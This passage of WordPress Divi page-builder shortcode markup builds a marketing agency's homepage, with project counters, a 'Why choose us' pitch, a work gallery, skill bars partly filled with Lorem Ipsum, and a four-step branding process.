use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\" hover_enabled=\"0\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\" hover_enabled=\"0\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>\n[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>\n[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" 